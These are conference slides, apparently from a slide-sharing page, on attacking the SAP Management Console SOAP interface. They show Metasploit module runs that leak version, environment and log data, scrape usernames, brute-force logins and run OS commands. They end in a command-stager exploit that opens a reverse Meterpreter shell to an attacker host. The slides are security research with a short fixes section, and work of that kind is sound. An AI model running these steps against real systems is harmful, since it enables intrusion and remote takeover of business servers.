SAP (in)security: Scrubbing SAP clean with SOAP

SAP (in)security
Scrubbing SAP clean with SOAP
Chris John Riley

“THE WISEST MAN, IS HE
WHO KNOWS, THAT HE
KNOWS NOTHING”
SOCRATES: APOLOGY, 21D

1) What's what
2) Information is king
3) Getting in the middle
4) Putting it all together
5) Stopping Bob!

“…the world's leading provider of
business software, SAP (which stands for
"Systems, Applications, and Products in
Data Processing") delivers products and
services that help accelerate business
innovation for our customers.”

Other people describe them as…

“…the world's leading repository of
business critical information, SAP (which
stands for ”Security Ain't [our] Problem")
delivers products and services that
helpattackers gain access to critical
enterprise data.”

Some rights reserved by TrevinC

Some rights reserved by Telstar Logistics

So Many Reasons
 Vulnerabilties are a part of it!
 Every system has it‘s vulnerabilities

 SAP installations often fall to business
 Not an operations problem
 Financial data should be handled by the business
 Security team never gets close to it!

“YOU CAN'T TEST THAT, IT'S
BUSINESS CRITICAL!”
UNKNOWN PROJECT MANAGER

You’re getting SOAP all over my SAP!

THIS TALK
SAP Security

Netweaver .

SOAP

A LITTLE BIT
ABOUT SAP
MANAGEMENT
CONSOLE

SAP MC Communications

 Default port 5<instance>13/14
 50013 HTTP
 50014 HTTPS
 Can use SSL
 If it‘s configured
 More on this later!

SAP MC Communications

 Uses Basic authfor some functions
 Yes... It‘s 2011
 Yes... Companies still use Basic Auth
 Most functions don‘t even use that!

“If there's one thing SAP MC loves,
it's giving away information“

Quote by:
Me, just now!

Information is king

 Version information
 Sure, HTTP headers give that!
 Nothing new here... mostly
 Down to the patch-level
 Can you say “targeted attack“

Version Information
msfauxiliary(sap_mgmt_con_version) > show options

Module options (auxiliary/scanner/sap/sap_mgmt_con_version):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOSTS 172.16.15.128 yes The target address range
RPORT 50013 yes The target port
THREADS 1 yes The number of threads
URI / no Path to the SAP MC
VHOST no HTTP server virtual host

Version Information
msfauxiliary(sap_mgmt_con_version) > run

[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[+] [SAP] Version Number Extracted - 172.16.15.128:50013
[+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel
[+] [SAP] SID: NSP
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Information is king

 Startup profile
 Instance name
 SAP System Name
 SAP SID
 SAP DB Schema
 Paths
 ....

Startup Profile
msfauxiliary(sap_mgmt_con_startprofile) > run

[+] [SAP] Startup Profile Extracted: WINXPSAP-
TSTsapmntNSPSYSprofileSTART_DVEBMGS00_WINXPSAP
-TST
[*] SAPSYSTEMNAME = NSP
[*] SAPGLOBALHOST = WINXPSAP-TST
[*] SAPSYSTEM = 00
[*] INSTANCE_NAME = DVEBMGS00
[*] DIR_PROFILE = WINXPSAP-TSTsapmntNSPSYSprofile
[*] _PF = $(DIR_PROFILE)NSP_DVEBMGS00_WINXPSAP-TST
[*] dbs/ada/schema = SAPNSP

Startup Profile
msfauxiliary(sap_mgmt_con_startprofile) > run

[+] [SAP] Startup Profile Extracted: WINXPSAP-
TSTsapmntNSPSYSprofileSTART_DVEBMGS00_WINXPSAP
-TST
[*] SAPSYSTEMNAME = NSP
[*] SAPGLOBALHOST = WINXPSAP-TST
[*] SAPSYSTEM = 00
[*] INSTANCE_NAME =DVEBMGS00
[*] DIR_PROFILE = WINXPSAP-TSTsapmntNSPSYSprofile
[*] _PF = $(DIR_PROFILE)NSP_DVEBMGS00_WINXPSAP-TST
[*] dbs/ada/schema = SAPNSP

Information is king

 Server / Instance Environment
 Computername
 Database Names
 Database Type (Oracle, MaxDB, ...)
 Full Server Environment Variable list!
 Information overload
 OMG why!

Environment
msfauxiliary(sap_mgmt_con_getenv) > run

[*] COMPUTERNAME=WINXPSAP-TST
[*] ComSpec=C:WINDOWSsystem32cmd.exe
[*] DBMS_TYPE=ada
[*] FP_NO_HOST_CHECK=NO
[*] OS=Windows_NT
[*] USERNAME=SAPServiceNSP
[*] PSModulePath=C:windowssystem32PowerShell...
[*] SAPEXE=E:usrsapNSPSYSexeucNTI386
[*] TMP=E:usrsapNSPtmp

Information is king

 SAP Log/Tracefiles
 SAP Startup Logs
 Error / Debug Logs
 Developer Traces
 Security Logs
 SAP ABAPSysLog
 SAP Startup Times
 PIDs
 Services + Status Info

Log/Trace Files
msfauxiliary(sap_mgmt_con_listlogfiles) > run

Filename Size Timestamp
-------- ---- ---------
available.log 2268 2011 10 16 12:52:33
dev_cp 4397 2011 04 19 10:30:48
dev_disp 4612 2011 10 14 15:06:14
dev_icm 6594 2011 10 14 15:07:38
sapstart.log 629 2011 10 14 15:06:04
sapstartsrv.log 754 2011 10 16 10:04:36
stderr1 903 2011 10 14 15:06:04

Log/Trace Files
<SAPControl:ReadDeveloperTraceResponse>
<name>E:usrsapNSPDVEBMGS00workdev_w0<name>
<item>trc file: "dev_w0", trc level: 1, release: "720"</item>
<item>---------------------------------------------------</item>
<item>* ACTIVE TRACE LEVEL 1</item>
<item>M pid 3564</item>
<item>M DpSysAdmExtCreate: ABAP is active</item>
<item>M DpShMCreate: allocated sys_adm at 09A40048</item>
<item>M DpShMCreate: allocated wp_adm at 09A43020</item>
<item>M DpShMCreate:allocated tm_adm at 09A47E48</item>
…

ABAP Log File
<SAPControl:ABAPReadSyslogResponse><log>
<item><Time>2011 10 14 15:06:18</Time>
<Text>SAP: ICM started on host WINXPSAP-TST (PID: 3536)
</Text><Severity>SAPControl-GREEN</Severity>
<item><Time>2011 10 14 15:06:12</Time>
<Text>SAP Basis: Active ICU Version 3.4; Compiled With ICU 3.4;
Unicode Version 4.1
</Text><Severity>SAPControl-GREEN</Severity></item>
…

Information is king

 Extracting data from logfiles
 Logfiles include usernames
 Scrape for usernames
 Instant brute-force user list!
 #wimming!
 Just an example of the data availble

Extract Users
[+] [SAP] Users Extracted: 10 entries extracted
[+] [SAP] Extracted User: SAPSYS
[+] [SAP] Extracted User: TEST1
[+] [SAP] Extracted User: TESTDEV
[+] [SAP] Extracted User: ADMIN1
[+] [SAP] Extracted User: SAPADM
[+] [SAP] Extracted User: TEST2
…

Information is king

 Process Parameters
 Output of the entire SAP configuration
 Password Policies
 Setup your Brute-force just right ;)
 Hash Types
 Still supporting those old 8 char hashes?
 Security Audit Log Enabled ?
 rsau/enabled (default: 0)
 Is anybody watching?

Process Parameters
msfauxiliary(sap_mgmt_con_getprocessparameter) > run
[*] [SAP] Connecting to SAP MC on 172.16.15.128:50013
[*] [SAP] Attempting to matche (?i-mx:^login/password)
[SAP] Process Parameters
Name Value
------ ----------
login/password_charset 1
login/password_downwards_compatibility 1
login/password_hash_algorithm encoding=RFC2307,
algorithm=iSSHA-1, saltsize=96
login/password_max_idle_productive 0

Process Parameters
<SAPControl:GetProcessParameterResponse><parameter>
<item><name>DIR_AUDIT</name>
<group>System</group>
<description>Directory for security audit files</description>
<unit/><value>E:usrsapNSPDVEBMGS00log</value></item>
<item><name>login/fails_to_user_lock</name>
<group>Login</group>
<description>Number of invalid login attempts until user
lock</description>
<unit/><value>5 </value></item>
…

Information is king

 Useful Process Parameters
 rsau/enabled
 login/password_downward_compatibility
 login/failed_user_auto_unlock
 login/fails_to_user_lock
 login/min_password_lng
 login/password_charset
 ....

*Checkout consolut.com for a great list

“I put a whitebox configuration audit
in your blackbox penetration test, so
you can whitebox SAP while you
blackbox it!“
Quote by:
Me, just now!

Information overload

 All unauthenticated
 But you have to be IN the network right!
 Right?

2,700
Number of SAP servers
2,675
listening on public addresses

2,650

2,625

2,600

2,575

2,550

2,525

2,500

Router Gateway SAP MC SAP MC (SSL)

Some rights reserved by Crystl

Getting in the middle

 Force Authentication
 Basic Auth == Clear Text
 Credentials FTW!
 Alter Requests
 Do what YOU want
 Alter Responses


 4 different options for SSL protection
 Self Signed
 Device Default (not an option for SAP)
 Enterprise CA
 You sign your own certs centrally
 Externally signed
 Diginotar to the rescue!
 SAP also offer signing services


 Impersonate SSL
 There‘s a module for that ;)
 Creates a fake cert
 As close to the original as possible
 Useful SE options
 Expired yesterday
 Add CN names for ease of use

OSExecute

 SAP MC generously offers OSExecute function
 Valid username/password req.
 That‘s handy!

MITM

 Using the force-auth method
 Check under the keyboard
 Post-it notes!
 Rubber hose method

Brute-Force

 Metasploit module
 Set SAP SID for SAP specific checks

 Watchout for lockouts!
 Denial of Service?

Brute Force
msfauxiliary(sap_mgmt_con_brute_login) > set SAP_SID NSP
msfauxiliary(sap_mgmt_con_brute_login) > run

[*]SAPSID set to 'NSP' - Setting default SAP wordlist
[*] Trying username:'sapservicensp' password:''
[-] [01/18] - failed to login as 'sapservicensp' password: ''
[*] Trying username:'sapservicensp' password:'sapserviceNSP’
[-] [02/18] - failed to login as 'sapadm' password: ''
[*] Trying username:'nspadm' password:''
…

OSExecute
auxiliary(sap_..._osexec) > set RHOSTS 172.16.15.128
auxiliary(sap_..._osexec) > set USERNAME sapservicensp
auxiliary(sap_..._osexec) > set PASSWORD Pr0d@dm1n
auxiliary(sap_..._osexec) > set CMD hostname
auxiliary(sap_..._osexec) > run
[+] [SAP] Command run as PID: 1240
Command output
--------------
WINXPSAP-TST

THANKS, BUT
WE WANT
METERPETER!

Getting Meterpreter

 Using tricks built into Metasploit
 Encode Payload
 Split it up into chucks
 Shove it in
 Start it up!
 Profit

OSExecuteMeterpreter
msfexploit(sap_mgmt_con_osexec_exploit) > exploit

[*] Started reverse handler on 172.16.15.134:4444
[*] Command Stager - 7.42% done (7499/101079 bytes)
...

[*] Command Stager - 100.00% done (101079/101079 bytes)
[*] Meterpretersession 1 opened(172.16.15.134:4444 ->
172.16.15.128:1144) at 2011-10-16 14:41:59 +0200
meterpreter>getuid
Server username: WINXPSAP-TSTSAPServiceNSP

WHY IS YOUR SAP
MC ACCESSIBLE
TO THE WORLD!

Fixing the issues

 SAP Fix
 SAP Note 1439348
 Issue also discovered by Onapsis
 No idea what it says!
 SAP restrict ALL fix info to customers only

Next Steps

 More Research
 Finish the MITM module
 Force Auth works now
 JAVA Applet deployment not so much
 Look at SAP SSL implementation
 SSL is a punching bag right now
 Sleep

Questions ?
http://c22.cc
contact@c22.cc

Big Thanks

 The REAL SAP Security Researchers
 Onapsis
 DSecRG
 Raul Siles
 CYBSEC
 SAP PSRT
 DirtySec (You know who you are!)
 MacLemon for the PPT-fu
 All the people who helped make this happen

Thanks for coming
contact@c22.cc

Sorry for sucking
so bad!
contact@c22.cc

SAP (in)security: Scrubbing SAP clean with SOAP

More Related Content

What's hot (20)

Similar to SAP (in)security: Scrubbing SAP clean with SOAP (20)

Recently uploaded (20)

SAP (in)security: Scrubbing SAP clean with SOAP

Editor's Notes